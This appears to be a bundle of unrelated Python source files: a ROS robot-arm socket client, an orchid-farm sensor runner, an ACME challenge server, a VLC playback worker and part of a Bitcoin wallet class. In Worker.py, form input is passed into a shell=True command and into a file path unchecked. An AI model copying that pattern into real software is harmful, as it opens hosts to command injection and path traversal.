self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return  # do not raise StopIteration inside a generator (it becomes a RuntimeError on Python 3.7+)
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##----------socket sent data flag-------------
# def socket_client_sent_flag(Sent_flag):
# global sent_feedback
# rospy.wait_for_service('sent_flag')
# try:
# Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
# sent_feedback = Sent_flag_client(Sent_flag)
# #pos_feedback_times = pos_feedback.response
# return sent_feedback
# except rospy.ServiceException as e:
# print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server side-------
def point_data(req): ## Receive pose data sent from the strategy side
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ## Receive arm mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ## Receive arm speed mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ## Receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## Create the server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server side end-------
##----------socket packet transmission--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data,Socket_sent_flag,arm_mode_flag
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('Press 1 to start transmission, 3 to exit: ')) # Enter the start command
start_input = 1
if start_input==1:
while 1:
##---------------socket transmission of arm commands-----------------
#if Arm_feedback == 0:
if arm_mode_flag == True:
arm_mode_flag = False
#-------Select mode--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------Set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------Set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------Set arm fast & safe mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action = 5 ## Switch back to the initial mode state
s.send(data.encode('utf-8')) # socket send; encode the Python str before sending
feedback_str = s.recv(1024)
# The arm side reports the arm state
if str(feedback_str[2]) == '70':# F: the arm is in the Ready state, prepared to receive the next motion command
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T: the arm is busy and cannot execute the next motion command
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6: the strategy has finished
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
# Check the send flag
if str(feedback_str[4]) == '48':# returns 0, false
Socket_sent_flag = False
if str(feedback_str[4]) == '49':# returns 1, true
Socket_sent_flag = True
##---------------socket transmission of arm commands end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket packet transmission end--------------##
## Multithreading
def thread_test():
socket_client()
## Multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5 ## Switch to the initial mode state
t = threading.Thread(target=thread_test)
t.start() # Start the worker thread
socket_server()
t.join()
# Ctrl+K Ctrl+C  Add line comment
# Ctrl+K Ctrl+U  Remove line comment
# Ctrl+] / Ctrl+[  Indent/outdent line
|
runner.py
|
#!/usr/bin/env python
from __future__ import unicode_literals
import os
import re
import time
import django.core.exceptions
from datetime import datetime, timedelta
from threading import Thread
from decimal import Decimal
import paho.mqtt.subscribe as subscribe
from django.core.management.base import BaseCommand
import orchid_app.sensors.anemometer as anemometer
import orchid_app.sensors.max44009 as light
import orchid_app.sensors.yf_201s as water
import orchid_app.sensors.mlx90614 as mlx
import orchid_app.sensors.bme280 as bme
import orchid_app.controller as controller
from orchid_app.models import Sensors, Actions
from orchid_app.utils import sysinfo
import warnings
warnings.filterwarnings('ignore')
POLL_PERIOD = 600 # seconds = 10 minutes
POLL_PERIOD_MIN = POLL_PERIOD / 60 # minutes
MAX_FLOW_RATE = 2.5 # L/minute. This is threshold for emergency water leakage detection. If more than the threshold then close the valves.
MAX_LEAK_RATE = 0.02
MAX_SEND_COUNT = POLL_PERIOD / 10 # Send leakage message once in hour
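# With one flow reading per minute, holding an alert for 60 readings corresponds to roughly one hour between messages.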
send_counter_leak = 0
send_counter_flow = 0
water_trigger = False
def avg(l):
'''Convert values of list from str to float if needed. Return average of the collected values.'''
if not l:
return 0.0
pre = [float(i) for i in l]
return round(sum(pre)/len(pre), 2)
class Command(BaseCommand):
help = 'Polls sensors and writes data into the DB.'
# def add_arguments(self, parser):
# parser.add_argument('poll_id', nargs='+', type=int)
def handle(self, *args, **options):
#######################################################################################
################## PREPARATIONS ########################
#######################################################################################
os.system('logger orchid_runner has started in `pwd`')
# Shut down on system start/restart everything could be open.
controller.activate(reason='System startup', force=True, mist=False, drip=False, fan=False, light=False, heat=False)
# Run measure and publishing of GPIO data in background.
threads = [Thread(target=water.run),
Thread(target=anemometer.run),
Thread(target=controller.act_current_state),
]
for t in threads:
t.setDaemon(True)
t.start()
# Keep preliminary data for averaging
data = {'wind': [], 'water': 0.0, 't_amb': [], 't_obj': [], 'hpa': [], 'rh': [], 'lux': []}
ts = time.time()
#######################################################################################
################## MAIN LOOP ########################
#######################################################################################
while True:
if time.time() - ts < POLL_PERIOD:
#######################################################################################
################## SHORT CYCLE ACTIONS, DATA AVERAGING ########################
#######################################################################################
try: # Catch sensor reading data, stay running
# Wait for MQTT data
topic = "shm/orchid/wind/last_min"
data['wind'].append(float(subscribe.simple(topic, keepalive=65, will={'topic': topic, 'payload': 0.0}).payload))
topic = "shm/orchid/water/last_min"
last_water = float(subscribe.simple(topic, keepalive=65, will={'topic': topic, 'payload': 0.0}).payload)
check_water_flow(last_water)
data['water'] += last_water
# Read i2c sensors
a, b, c = bme.readBME280All()
data['t_amb'].append(a)
data['hpa'].append(b)
data['rh'].append(c)
data['t_obj'].append(mlx.Melexis().readObject1())
data['lux'].append(light.readLight())
except Exception as e:
self.stderr.write('On sensors read: %s (%s)' % (e.message, type(e)))
time.sleep(60) # Wait 1 minute before retry.
t_cpu = sysinfo.read_cpu()['temp']['current']
if int(t_cpu) > 80:
os.system('logger orchid_runner CPU temperature %s' % str(t_cpu))
else:
#######################################################################################
################## LONG CYCLE ACTIONS, SD-CARD WRITE ########################
#######################################################################################
n = datetime.now()
s = Sensors()
s.date = n.replace(minute=n.minute / POLL_PERIOD_MIN * POLL_PERIOD_MIN, second=0, microsecond=0) # reduce to poll period resolution
# Data conditioning by model/DB requirements
s.t_amb = Decimal('{:.1f}'.format(avg(data['t_amb'])))
s.t_obj = Decimal('{:.1f}'.format(avg(data['t_obj'])))
s.water = Decimal('{:.1f}'.format(data['water']))
s.wind = Decimal('{:.1f}'.format(avg(data['wind'])))
s.hpa = Decimal('{:.1f}'.format(avg(data['hpa'])))
s.rh = int(avg(data['rh']))
s.lux = int(avg(data['lux']))
# self.stdout.write(str(s))
try: # Catch sensor reading data, stay running
# Write data to the DB
s.save()
# self.stdout.write('Sensor Records: ' + repr(Sensors.objects.count()))
except Exception as e:
self.stderr.write('On DB write: %s (%s)' % (e.message, type(e)))
time.sleep(60) # Wait 1 minute before retry.
# Reset the data structure
data = {'wind': [], 'water': 0.0, 't_amb': [], 't_obj': [], 'hpa': [], 'rh': [], 'lux': []}
ts = time.time()
# # Calculate current state
# controller.read_current_state()
# Example of catch bad data
# try:
# poll = Poll.objects.get(pk=poll_id)
# except Poll.DoesNotExist:
# raise CommandError('Poll "%s" does not exist' % poll_id)
# self.stdout.write(self.style.SUCCESS('Successfully closed poll "%s"' % poll_id))
def check_water_flow(liters):
# Take emergency actions
# Find out which valve is open
la = controller.get_last_action()
if (la.mist or la.water) and liters > MAX_FLOW_RATE:
if is_alert_eligible(is_leak=False):
# Try to shut open valve off
controller.activate(reason='Emergency shut off', force=True, mist=False, water=False,
fan=la.fan, light=la.light, heat=la.heat)
# Build emergency message
msg = 'Water leakage is detected in circuit(s): '
msg += 'drip ' if la.water else ''
msg += 'mist' if la.mist else ''
msg += '\n%s liters of water ran in last minute when should be no more than %s liters/minute.\n' \
'Opened valve closed. This may impact watering and/or temperature conditions.\n' \
'Take actions immediately.' % (str(round(liters, 3)), str(MAX_FLOW_RATE))
subj = 'Orchid farm emergency: water leakage detected'
controller.send_message(subj, msg)
return
# Check leakage when all valves closed
elif (not la.mist and not la.water) and liters > MAX_LEAK_RATE:
global water_trigger
if is_alert_eligible(is_leak=True):
# Try to shut open valve off
controller.activate(reason='Emergency shut off', force=True, mist=False, water=False,
fan=la.fan, light=la.light, heat=la.heat)
# Build emergency message
msg = 'Water leakage is detected while all valves should be closed.'\
'\n%s liters of water leaked in last minute when should be 0.\n' \
'Tried to close all valves. This may impact watering and/or temperature conditions.\n' \
'Take actions immediately.' % str(round(liters, 3))
subj = 'Orchid farm emergency: water leakage detected'
controller.send_message(subj, msg)
print "water leak alert must be sent", str(datetime.now())
water_trigger = None
return
# Check water is running when drip is on
elif la.water and liters <= MAX_LEAK_RATE:
global send_counter_flow
if 0 < send_counter_flow < MAX_SEND_COUNT:
send_counter_flow += 1
print "No water flow alert on hold", str(datetime.now())
return
elif send_counter_flow != 0: # >= MAX_SEND_COUNT
send_counter_flow = 0
return
# Shut the alert! Send_counter_flow == 0 here.
# Build emergency message
msg = "Water isn't flowing while dripping valve is open."\
'\n%s liters of water leaked in last minute when should be more.\n' \
'This may impact watering and/or temperature conditions.\n' \
'Take actions immediately.' % str(round(liters, 3))
subj = 'Orchid farm emergency: no water detected'
controller.send_message(subj, msg)
print "No water alert must be sent", str(datetime.now())
def is_alert_eligible(is_leak=False):
WATER_TIMEOUT = 300
global send_counter_leak
global send_counter_flow
if is_leak:
if 0 < send_counter_leak < MAX_SEND_COUNT:
send_counter_leak += 1
print "water leak alert on hold", str(datetime.now())
elif send_counter_leak != 0:
send_counter_leak = 0
else:
if 0 < send_counter_flow < MAX_SEND_COUNT:
send_counter_flow += 1
print "water flow alert on hold", str(datetime.now())
elif send_counter_flow != 0:
send_counter_flow = 0
if not is_leak and send_counter_flow == 0:
print "water flow alert must be sent", str(datetime.now())
return True
if is_leak and send_counter_leak == 0: # send_counter == 0, shoot the message
global water_trigger
if water_trigger:
dt = (datetime.now() - water_trigger).total_seconds()
# Return True if got second alert in interval of 1-5 minutes from first one.
if 60 < dt < WATER_TIMEOUT:
print "water leakage alert must be sent", str(datetime.now())
return True
elif dt >= WATER_TIMEOUT:
# Remove trigger if first one was long time ago, not relevant anymore.
print "water leak alert expired", str(datetime.now())
water_trigger = None
else:
print "water leak alert triggered", str(datetime.now())
water_trigger = datetime.now()
return False
|
standalone.py
|
"""Support for standalone client challenge solvers. """
import collections
import functools
import http.client as http_client
import http.server as BaseHTTPServer
import logging
import socket
import socketserver
import threading
from typing import List
from acme import challenges
from acme import crypto_util
logger = logging.getLogger(__name__)
class TLSServer(socketserver.TCPServer):
"""Generic TLS Server."""
def __init__(self, *args, **kwargs):
self.ipv6 = kwargs.pop("ipv6", False)
if self.ipv6:
self.address_family = socket.AF_INET6
else:
self.address_family = socket.AF_INET
self.certs = kwargs.pop("certs", {})
self.method = kwargs.pop(
"method", crypto_util._DEFAULT_SSL_METHOD)
self.allow_reuse_address = kwargs.pop("allow_reuse_address", True)
socketserver.TCPServer.__init__(self, *args, **kwargs)
def _wrap_sock(self):
self.socket = crypto_util.SSLSocket(
self.socket, cert_selection=self._cert_selection,
alpn_selection=getattr(self, '_alpn_selection', None),
method=self.method)
def _cert_selection(self, connection): # pragma: no cover
"""Callback selecting certificate for connection."""
server_name = connection.get_servername()
return self.certs.get(server_name, None)
def server_bind(self):
self._wrap_sock()
return socketserver.TCPServer.server_bind(self)
class ACMEServerMixin:
"""ACME server common settings mixin."""
# TODO: c.f. #858
server_version = "ACME client standalone challenge solver"
allow_reuse_address = True
class BaseDualNetworkedServers:
"""Base class for a pair of IPv6 and IPv4 servers that tries to do everything
it's asked for both servers, but where failures in one server don't
affect the other.
If two servers are instantiated, they will serve on the same port.
"""
def __init__(self, ServerClass, server_address, *remaining_args, **kwargs):
port = server_address[1]
self.threads: List[threading.Thread] = []
self.servers: List[socketserver.BaseServer] = []
# Must try True first.
# Ubuntu, for example, will fail to bind to IPv4 if we've already bound
# to IPv6. But that's ok, since it will accept IPv4 connections on the IPv6
# socket. On the other hand, FreeBSD will successfully bind to IPv4 on the
# same port, which means that server will accept the IPv4 connections.
# If Python is compiled without IPv6, we'll error out but (probably) successfully
# create the IPv4 server.
for ip_version in [True, False]:
try:
kwargs["ipv6"] = ip_version
new_address = (server_address[0],) + (port,) + server_address[2:]
new_args = (new_address,) + remaining_args
server = ServerClass(*new_args, **kwargs)
logger.debug(
"Successfully bound to %s:%s using %s", new_address[0],
new_address[1], "IPv6" if ip_version else "IPv4")
except socket.error:
if self.servers:
# Already bound using IPv6.
logger.debug(
"Certbot wasn't able to bind to %s:%s using %s, this "
"is often expected due to the dual stack nature of "
"IPv6 socket implementations.",
new_address[0], new_address[1],
"IPv6" if ip_version else "IPv4")
else:
logger.debug(
"Failed to bind to %s:%s using %s", new_address[0],
new_address[1], "IPv6" if ip_version else "IPv4")
else:
self.servers.append(server)
# If two servers are set up and port 0 was passed in, ensure we always
# bind to the same port for both servers.
port = server.socket.getsockname()[1]
if not self.servers:
raise socket.error("Could not bind to IPv4 or IPv6.")
def serve_forever(self):
"""Wraps socketserver.TCPServer.serve_forever"""
for server in self.servers:
thread = threading.Thread(
target=server.serve_forever)
thread.start()
self.threads.append(thread)
def getsocknames(self):
"""Wraps socketserver.TCPServer.socket.getsockname"""
return [server.socket.getsockname() for server in self.servers]
def shutdown_and_server_close(self):
"""Wraps socketserver.TCPServer.shutdown, socketserver.TCPServer.server_close, and
threading.Thread.join"""
for server in self.servers:
server.shutdown()
server.server_close()
for thread in self.threads:
thread.join()
self.threads = []
class TLSALPN01Server(TLSServer, ACMEServerMixin):
"""TLSALPN01 Server."""
ACME_TLS_1_PROTOCOL = b"acme-tls/1"
def __init__(self, server_address, certs, challenge_certs, ipv6=False):
TLSServer.__init__(
self, server_address, _BaseRequestHandlerWithLogging, certs=certs,
ipv6=ipv6)
self.challenge_certs = challenge_certs
def _cert_selection(self, connection):
# TODO: We would like to serve challenge cert only if asked for it via
# ALPN. To do this, we need to retrieve the list of protos from client
# hello, but this is currently impossible with openssl [0], and ALPN
# negotiation is done after cert selection.
# Therefore, currently we always return challenge cert, and terminate
# handshake in alpn_selection() if ALPN protos are not what we expect.
# [0] https://github.com/openssl/openssl/issues/4952
server_name = connection.get_servername()
logger.debug("Serving challenge cert for server name %s", server_name)
return self.challenge_certs.get(server_name, None)
def _alpn_selection(self, _connection, alpn_protos):
"""Callback to select alpn protocol."""
if len(alpn_protos) == 1 and alpn_protos[0] == self.ACME_TLS_1_PROTOCOL:
logger.debug("Agreed on %s ALPN", self.ACME_TLS_1_PROTOCOL)
return self.ACME_TLS_1_PROTOCOL
logger.debug("Cannot agree on ALPN proto. Got: %s", str(alpn_protos))
# Explicitly close the connection now, by returning an empty string.
# See https://www.pyopenssl.org/en/stable/api/ssl.html#OpenSSL.SSL.Context.set_alpn_select_callback # pylint: disable=line-too-long
return b""
class HTTPServer(BaseHTTPServer.HTTPServer):
"""Generic HTTP Server."""
def __init__(self, *args, **kwargs):
self.ipv6 = kwargs.pop("ipv6", False)
if self.ipv6:
self.address_family = socket.AF_INET6
else:
self.address_family = socket.AF_INET
BaseHTTPServer.HTTPServer.__init__(self, *args, **kwargs)
class HTTP01Server(HTTPServer, ACMEServerMixin):
"""HTTP01 Server."""
def __init__(self, server_address, resources, ipv6=False, timeout=30):
HTTPServer.__init__(
self, server_address, HTTP01RequestHandler.partial_init(
simple_http_resources=resources, timeout=timeout), ipv6=ipv6)
class HTTP01DualNetworkedServers(BaseDualNetworkedServers):
"""HTTP01Server Wrapper. Tries everything for both. Failures for one don't
affect the other."""
def __init__(self, *args, **kwargs):
BaseDualNetworkedServers.__init__(self, HTTP01Server, *args, **kwargs)
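# Illustrative usage sketch (not part of the original module): how the dual-stack
# wrapper defined above is typically driven. The port and the empty resource set
# are placeholders; real callers pass HTTP01RequestHandler.HTTP01Resource objects.
#
#     servers = HTTP01DualNetworkedServers(("", 5002), set())
#     servers.serve_forever()              # one thread per bound server
#     servers.getsocknames()               # e.g. [("0.0.0.0", 5002), ("::", 5002, 0, 0)]
#     servers.shutdown_and_server_close()  # stop both servers and join the threads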
class HTTP01RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""HTTP01 challenge handler.
Adheres to the stdlib's `socketserver.BaseRequestHandler` interface.
:ivar set simple_http_resources: A set of `HTTP01Resource`
objects. TODO: better name?
"""
HTTP01Resource = collections.namedtuple(
"HTTP01Resource", "chall response validation")
def __init__(self, *args, **kwargs):
self.simple_http_resources = kwargs.pop("simple_http_resources", set())
self._timeout = kwargs.pop('timeout', 30)
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
self.server: HTTP01Server
# In parent class BaseHTTPRequestHandler, 'timeout' is a class-level property but we
# need to define its value during the initialization phase in HTTP01RequestHandler.
# However MyPy does not appreciate that we dynamically shadow a class-level property
# with an instance-level property (e.g. self.timeout = ... in __init__()). So to make
# everyone happy, we statically redefine 'timeout' as a method property, and set the
# timeout value in a new internal instance-level property _timeout.
@property
def timeout(self):
"""
The default timeout this server should apply to requests.
:return: timeout to apply
:rtype: int
"""
return self._timeout
def log_message(self, format, *args): # pylint: disable=redefined-builtin
"""Log arbitrary message."""
logger.debug("%s - - %s", self.client_address[0], format % args)
def handle(self):
"""Handle request."""
self.log_message("Incoming request")
BaseHTTPServer.BaseHTTPRequestHandler.handle(self)
def do_GET(self): # pylint: disable=invalid-name,missing-function-docstring
if self.path == "/":
self.handle_index()
elif self.path.startswith("/" + challenges.HTTP01.URI_ROOT_PATH):
self.handle_simple_http_resource()
else:
self.handle_404()
def handle_index(self):
"""Handle index page."""
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.end_headers()
self.wfile.write(self.server.server_version.encode())
def handle_404(self):
"""Handler 404 Not Found errors."""
self.send_response(http_client.NOT_FOUND, message="Not Found")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(b"404")
def handle_simple_http_resource(self):
"""Handle HTTP01 provisioned resources."""
for resource in self.simple_http_resources:
if resource.chall.path == self.path:
self.log_message("Serving HTTP01 with token %r",
resource.chall.encode("token"))
self.send_response(http_client.OK)
self.end_headers()
self.wfile.write(resource.validation.encode())
return
else: # pylint: disable=useless-else-on-loop
self.log_message("No resources to serve")
self.log_message("%s does not correspond to any resource. ignoring",
self.path)
@classmethod
def partial_init(cls, simple_http_resources, timeout):
"""Partially initialize this handler.
This is useful because `socketserver.BaseServer` takes
uninitialized handler and initializes it with the current
request.
"""
return functools.partial(
cls, simple_http_resources=simple_http_resources,
timeout=timeout)
class _BaseRequestHandlerWithLogging(socketserver.BaseRequestHandler):
"""BaseRequestHandler with logging."""
def log_message(self, format, *args): # pylint: disable=redefined-builtin
"""Log arbitrary message."""
logger.debug("%s - - %s", self.client_address[0], format % args)
def handle(self):
"""Handle request."""
self.log_message("Incoming request")
socketserver.BaseRequestHandler.handle(self)
|
Worker.py
|
import os
import sys
from pathlib import Path
from subprocess import Popen, PIPE
from threading import Thread
from time import sleep
from bin.Setup import Setup
from bin.Utils import Utils, Singleton
@Singleton
class Worker:
current_process = None
tmp_files = []
def manage_command(self, form):
try:
command = form.getvalue('COMMAND')
except KeyError:
print("ERROR : No command given", file=sys.stderr)
return 400
try:
if command == "PLAY_NEW_STREAM":
return self.play_new_stream(form)
elif command == "PLAY_NEW_FILE":
return self.play_new_file(form)
elif command == "PING":
return 200
elif command == "PROCESS_STATUS":
return 102 if self.process_running() else 100
else:
return 405
except KeyError as e:
print("ERROR : Missing parameter(s) : ", e, file=sys.stderr)
return 400
except RuntimeError as e:
print(e, file=sys.stderr)
return 409
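# Status codes returned by manage_command above:
#   200 - command executed successfully (or PING)
#   102 / 100 - PROCESS_STATUS: player process running / not running
#   400 - COMMAND missing, or a required parameter is missing
#   405 - unknown command
#   409 - a player process is already running (RuntimeError from play_single_on_vlc)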
def play_new_stream(self, form):
source = form.getvalue('STREAM_SOURCE')
if source is None:
raise KeyError("STREAM_SOURCE")
self.play_single_on_vlc(source)
return 200
def play_single_on_vlc(self, source):
if not self.process_running():
vlc = Utils.get_vlc_default()
vlc_path = vlc[0]
vlc_cmd = vlc[1] + ' "' + source + '" ' + Setup.VLC_PLAYLIST_END
self.execute(vlc_cmd, vlc_path)
else:
raise RuntimeError("Process already running")
def play_new_file(self, form):
filename = os.path.join(Path(__file__).parents[1], "tmp", form.getvalue("FILENAME"))
length = int(form.headers['Content-Length'])
file_obj = form['FILE'].file
with open(filename, 'wb+') as f:
f.write(file_obj.read(length))
self.tmp_files.append(filename)
self.play_single_on_vlc(filename)
return 200
def execute(self, cmd, path):
self.current_process = Popen(cmd, stdout=PIPE, bufsize=1, close_fds=Setup.POSIX, shell=True, cwd=path)
process_watchdog = Thread(target=self._process_end, daemon=True)
process_watchdog.start()
def process_running(self):
if self.current_process is None:
return False
if self.current_process.poll() is None:
return True
else:
self.current_process = None
return False
def _process_end(self):
while self.process_running():
sleep(60)
while self.tmp_files:
file = self.tmp_files.pop()
if os.path.isfile(file):
os.remove(file)
|
wallet.py
|
import copy, hashlib, json, logging, os
import time
from .device import Device
from .key import Key
from .util.merkleblock import is_valid_merkle_proof
from .helpers import der_to_bytes
from .util.base58 import decode_base58
from .util.descriptor import Descriptor, sort_descriptor, AddChecksum
from .util.xpub import get_xpub_fingerprint
from .util.tx import decoderawtransaction
from .persistence import write_json_file, delete_file
from hwilib.serializations import PSBT, CTransaction
from io import BytesIO
from .specter_error import SpecterError
import threading
import requests
from math import ceil
from .addresslist import AddressList
from .txlist import TxList
logger = logging.getLogger()
class Wallet:
# if the wallet is old we import 300 addresses
IMPORT_KEYPOOL = 300
# a gap of 20 addresses is what many wallets do
GAP_LIMIT = 20
# minimal fee rate is slightly above 1 sat/vbyte
# to avoid rounding errors
MIN_FEE_RATE = 1.01
def __init__(
self,
name,
alias,
description,
address_type,
address,
address_index,
change_address,
change_index,
keypool,
change_keypool,
recv_descriptor,
change_descriptor,
keys,
devices,
sigs_required,
pending_psbts,
fullpath,
device_manager,
manager,
old_format_detected=False,
last_block=None,
):
self.name = name
self.alias = alias
self.description = description
self.address_type = address_type
self.address = address
self.address_index = address_index
self.change_address = change_address
self.change_index = change_index
self.keypool = keypool
self.change_keypool = change_keypool
self.recv_descriptor = recv_descriptor
self.change_descriptor = change_descriptor
self.keys = keys
self.devices = [
(
device
if isinstance(device, Device)
else device_manager.get_by_alias(device)
)
for device in devices
]
if None in self.devices:
raise Exception("A device used by this wallet could not have been found!")
self.sigs_required = int(sigs_required)
self.pending_psbts = pending_psbts
self.fullpath = fullpath
self.manager = manager
self.rpc = self.manager.rpc.wallet(
os.path.join(self.manager.rpc_path, self.alias)
)
self.last_block = last_block
addr_path = self.fullpath.replace(".json", "_addr.csv")
self._addresses = AddressList(addr_path, self.rpc)
if not self._addresses.file_exists:
self.fetch_labels()
txs_path = self.fullpath.replace(".json", "_txs.csv")
self._transactions = TxList(
txs_path, self.rpc, self._addresses, self.manager.chain
)
if address == "":
self.getnewaddress()
if change_address == "":
self.getnewaddress(change=True)
self.update()
if old_format_detected or self.last_block != last_block:
self.save_to_file()
def fetch_labels(self):
"""Load addresses and labels to self._addresses"""
recv = [
dict(
address=self.get_address(idx, change=False, check_keypool=False),
index=idx,
change=False,
)
for idx in range(self.keypool)
]
change = [
dict(
address=self.get_address(idx, change=True, check_keypool=False),
index=idx,
change=True,
)
for idx in range(self.change_keypool)
]
# TODO: load addresses for all txs here as well
self._addresses.add(recv + change, check_rpc=True)
def fetch_transactions(self):
"""Load transactions from Bitcoin Core"""
arr = []
idx = 0
batch = 100
while True:
res = self.rpc.listtransactions("*", batch, batch * idx, True)
res = [
tx
for tx in res
if tx["txid"] not in self._transactions
or self._transactions[tx["txid"]].get("blockhash", None)
!= tx.get("blockhash", None)
or self._transactions[tx["txid"]].get("conflicts", [])
!= tx.get("walletconflicts", [])
]
# TODO: Looks like Core ignore a consolidation (self-transfer) going into the change address (in listtransactions)
# This means it'll show unconfirmed for us forever...
arr.extend(res)
idx += 1
# not sure if Core <20 returns last batch or empty array at the end
if len(res) < batch or len(arr) < batch * idx:
break
txs = dict.fromkeys([a["txid"] for a in arr])
txids = list(txs.keys())
# get all raw transactions
res = self.rpc.multi([("gettransaction", txid) for txid in txids])
for i, r in enumerate(res):
txid = txids[i]
# check if we already added it
if txs.get(txid, None) is not None:
continue
txs[txid] = r["result"]
self._transactions.add(txs)
def update(self):
self.getdata()
self.get_balance()
self.check_addresses()
def check_unused(self):
"""Check current receive address is unused and get new if needed"""
addr = self.address
while self.rpc.getreceivedbyaddress(addr, 0) != 0:
addr = self.getnewaddress()
def check_addresses(self):
"""Checking the gap limit is still ok"""
if self.last_block is None:
obj = self.rpc.listsinceblock()
else:
# sometimes last_block is invalid, not sure why
try:
obj = self.rpc.listsinceblock(self.last_block)
except:
logger.error(f"Invalid block {self.last_block}")
obj = self.rpc.listsinceblock()
txs = obj["transactions"]
last_block = obj["lastblock"]
addresses = [tx["address"] for tx in txs]
# remove duplicates
addresses = list(dict.fromkeys(addresses))
max_recv = self.address_index - 1
max_change = self.change_index - 1
# get max used from addresses list
max_recv = max(max_recv, self._addresses.max_used_index(False))
max_change = max(max_change, self._addresses.max_used_index(True))
# from tx list
for addr in addresses:
if addr in self._addresses:
a = self._addresses[addr]
if a.index is not None:
if a.change:
max_change = max(max_change, a.index)
else:
max_recv = max(max_recv, a.index)
updated = False
while max_recv >= self.address_index:
self.getnewaddress(change=False, save=False)
updated = True
while max_change >= self.change_index:
self.getnewaddress(change=True, save=False)
updated = True
# save only if needed
if updated:
self.save_to_file()
self.last_block = last_block
@staticmethod
def parse_old_format(wallet_dict, device_manager):
old_format_detected = False
new_dict = {}
new_dict.update(wallet_dict)
